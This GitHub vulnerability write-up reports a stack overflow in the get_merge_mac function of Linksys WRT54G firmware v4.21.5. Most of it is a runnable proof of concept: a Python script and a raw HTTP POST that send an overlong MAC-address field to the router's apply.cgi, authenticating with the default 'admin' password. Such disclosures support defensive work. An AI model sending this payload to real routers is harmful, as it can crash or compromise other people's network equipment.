Skip to content

Latest commit

 

History

History
59 lines (51 loc) · 3.76 KB

Linksys_WRT54G_get_merge_mac.md

File metadata and controls

59 lines (51 loc) · 3.76 KB
Raw

Overview

Product overview https://store.linksys.com/support-product?sku=WRT54G

Affected version

Linksys WRT54G Firmware v4.21.5

Vulnerability details

The Linksys WRT54G Firmware v4.21.5 has a stack overflow vulnerability in get_merge_mac function. The variable def_hwaddr_%dreceives the parameter from a POST request. In line 17, the stract function will merge it with the variable a2. It is important to note that in the calling function, the a2 variable is stack-allocated and has a size of only 24 characters. If the variable exceeds this length, it can result in a buffer overflow vulnerability, potentially leading to remote code execution or denial-of-service attacks.
image.png image.png

POC

import requests

url = 'http://192.168.1.1/apply.cgi'
headers = {
    'Host': '192.168.1.1',
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0',
    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8',
    'Accept-Language': 'en-US,en;q=0.5',
    'Accept-Encoding': 'gzip, deflate',
    'Content-Type': 'application/x-www-form-urlencoded',
    'Origin': 'http://192.168.1.1',
    'Authorization': 'Basic OmFkbWlu',
    'Connection': 'close',
    'Referer': 'http://192.168.1.1/WanMAC.asp',
    'Upgrade-Insecure-Requests': '1',
    'Priority': 'u=1',
}

payload = ('submit_button=WanMAC&change_action=&submit_type=&action=Apply&mac_clone_enable=1&def_hwaddr=6&'
           'def_hwaddr_0=1C&def_hwaddr_1=0F&def_hwaddr_2=66&def_hwaddr_3=0A&'
           'def_hwaddr_4=111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111&'
           'def_hwaddr_5=E3')

response = requests.post(url, headers=headers, data=payload)

print('Status:', response.status_code)
print('Response:', response.text)
POST /apply.cgi HTTP/1.1
Host: 192.168.1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 197
Origin: http://192.168.1.1
Authorization: Basic OmFkbWlu
Connection: close
Referer: http://192.168.1.1/WanMAC.asp
Upgrade-Insecure-Requests: 1
Priority: u=1

submit_button=WanMAC&change_action=&submit_type=&action=Apply&mac_clone_enable=1&def_hwaddr=6&def_hwaddr_0=1C&def_hwaddr_1=0F&def_hwaddr_2=66&def_hwaddr_3=0A&def_hwaddr_4=111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111&def_hwaddr_5=E3